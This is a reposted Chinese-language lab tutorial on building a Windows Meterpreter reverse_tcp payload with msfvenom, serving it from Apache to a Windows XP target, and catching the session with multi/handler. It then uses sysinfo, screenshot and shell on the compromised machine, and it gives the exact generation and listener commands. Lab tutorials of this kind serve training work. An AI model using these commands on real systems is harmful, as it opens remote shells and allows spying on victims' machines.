4.1 MSF 制作shellcode,且运行

这篇具有很好参考价值的文章主要介绍了4.1 MSF 制作shellcode,且运行。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、实验清单

二、实验思路

三、实验步骤

1、在控制台中,使用“msfvenom -h”命令可以查看msfvenom的相关命令

2、制作shellcode

 3、监听与处理


一、实验清单

实验所需清单
类型 序号 软硬件要求 规格
攻击机 1 数量 1台
2 操作系统版本 kali
3 软件版本 metasploit
靶机 1 数量 1台
2 操作系统版本 windows xp
3 软件版本

二、实验思路

        通过MSF中的msfvenom制作shellcode,在靶机上运行该shellcode,在metasploit console中使用multi/handler模块启动监听器。

三、实验步骤

1、在控制台中,使用“msfvenom -h”命令可以查看msfvenom的相关命令

root@kali:~# msfvenom -h                           
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

        其中,常用的参数有:

-a 操作系统架构

-e 对生成的shellcode进行编码

-i 编码次数

-platform 操作系统类型

-p 设置payload,也就是决定你制作的是哪种shellcode,是反弹shell?还是仅仅在靶机命令行窗口运行一条指令...

-f shellcode的输出格式(如exe文件...)

-o shellcode的输出路径(也就是shellcode保存在哪儿)

Lhost(listen host) 本机IP

Lport( listen port)  本机用于监听的端口

2、制作shellcode

root@kali:~# msfvenom -a x86 --platform wimdows -p windows/meterpreter/reverse_tcp LHOST=192.168.92.129 LPORT=4444 -f exe -o /var/www/html/test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: /var/www/html/test.exe

      本实验制作的shellcode保存在“/var/www/html/test.exe”路径下,然后使用“service apache2 start”命令开启kali上自带的apache。之后,在靶机浏览器上输入“192.168.92.129/test.exe”,将test.exe文件下载到靶机上。

4.1 MSF 制作shellcode,且运行

 3、监听与处理

        在kali上打开msf,并输入以下命令:

use exploit/multi/handler  载入multi/handler模块
set payload windows/meterpreter/reverse_tcp  设置payload
set LHOST 192.168.92.129
set LPORT 4444
run

        在靶机上运行test.exe文件。此时,msf console会变成:

meterpreter >

        使用“sysinfo”命令,可以查看靶机信息:

4.1 MSF 制作shellcode,且运行

        “screenshot”命令,可以截取当前靶机的屏幕:

4.1 MSF 制作shellcode,且运行

4.1 MSF 制作shellcode,且运行

         “shell”命令,则可以在kali上运行靶机的命令行:

4.1 MSF 制作shellcode,且运行

4.1 MSF 制作shellcode,且运行

 文章来源地址https://www.toymoban.com/news/detail-460622.html

 

到了这里,关于4.1 MSF 制作shellcode,且运行的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 山东大学单片机原理与应用实验 4.1 按键声光报警实验

    目录 一、实验题目 二、实验要求 三、实验过程及结果 四、实验流程图 五、实验源代码 4.4按键声光报警实验 1、画出实验的流程图 2、编写源程序并进行注释 3、记录实验过程 4、记录程序运行结果截图 本实验联系静态按键识别,发光二极管驱动,以及外部中断的使用方法,

    2024年02月04日
    浏览(69)
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan CFS三层靶场搭建: 内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSD

    2024年02月02日
    浏览(40)
  • msf--Linux反弹shell--一看就会的实验

    环境如下 vps :Linux ubuntu 4.15.0-180-generic (已经打开8989端口) win:Windows Feature Experience Pack 120.2212.4180.0(可以随意) 靶机:Linux ubuntu 4.18.0-25-generic 过程如下 1.在vps里面生成木马  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=8989 -f elf asd  2.将木马下载到本机桌面 sz a

    2023年04月13日
    浏览(52)
  • MSF手机渗透实验(未成功)(CVE-2019-2215 Binder UA)

    最近想利用metasploit对手机进行依次渗透实验。 通过查看最近三年的安卓漏洞,我对CVE-2019-2215这个漏洞很感兴趣。 幸运的是,metasploit里就有这个漏洞的攻击payload,于是我就开始试试了。 在环境的准备中,你需要有一个kali环境。可以参考我的这篇博客: 5分钟完成 Kali linux安

    2024年02月09日
    浏览(32)
  • 记一次MSF永恒之蓝入侵win7系统实验

      目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目标机cmd  5# meterpreter基础命令 攻击源ip:192.168.193.130     #系统:kali      镜像下载地址:点击跳转  靶 机  ip:192.168.19

    2024年02月13日
    浏览(36)
  • win10系统切换到macOS,开发环境与软件资源,目录清单

    1、因为考研自习室或学校图书馆,随身携带游戏本(全能本)受限于 不插电源就不续航和掉性能,以及风扇噪音非常大,以及发热很烫 等问题。 2、所以想考虑给主力机换个mac,目前暂定是买啦 m1pro(10+16)+16g+1t 的版本,因为原来的电脑空间用了非常多,不得不删掉一些东西

    2024年02月15日
    浏览(48)
  • 全面理解哈希,哈希的底层原理是如何实现的,哈希题型的做题思路与题目清单(不断更新)

    哈希(Hash)是一种算法,它接受一个输入(或“消息”),并返回一个固定大小的字符串。这个输出字符串的大小通常以字节为单位,输出的内容看起来是随机的且整个过程是单向的。 哈希的一些关键特性包括: 不管你输入的信息有多大,哈希值的大小总是固定的。 即使只

    2024年02月04日
    浏览(44)
  • 【问题】----运行jar命令提示没有主清单属性

    在pom.xml中添加/修改maven打包依赖: 当我们将打包插件依赖删除后会发现项目照样可以打包,由此可见我们出错是因为使用了原始maven打包,并没有使用我们添加的打包插件打包。 没有使用打包插件时在项目中打开MANIFEST.MF文件会发现有Main-Class属性,当打开jar包会发现里面的

    2024年02月15日
    浏览(70)
  • 4.1底盘基础功能:nmcli命令配置机器人无线网 Xshell中进行(冰达ros机器人例程运行)

    4.1.3nmcli命令配置机器人无线网 Xshell中进行(Xshell此软件安装包在3.windows实用软件当中下载)注:如果没有办法使用直接百度上搜索Xshell官网下载最新版本 配置无线网络视频教程首先准备一台路由器和网线 如下图所示连接小车(注:路由器可以没有互联网) 连上小车后需等

    2024年04月25日
    浏览(52)
  • 【Java】关于Springboot项目打包后运行提示“没有项目主清单”的解决问题

    1.问题复现 若使用maven打包后,使用 java -jar packge-name-pro-0.0.1.jar 运行jar包出现如下提示: packge-name-pro-0.0.1.jar 中没有主清单属性 说明在项目 pom.xml 文件中配置有问题 2.解决方法 打开你的 pom.xml 文件,在 project 标签内,添加如下代码: 关键代码是:

    2024年02月03日
    浏览(63)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包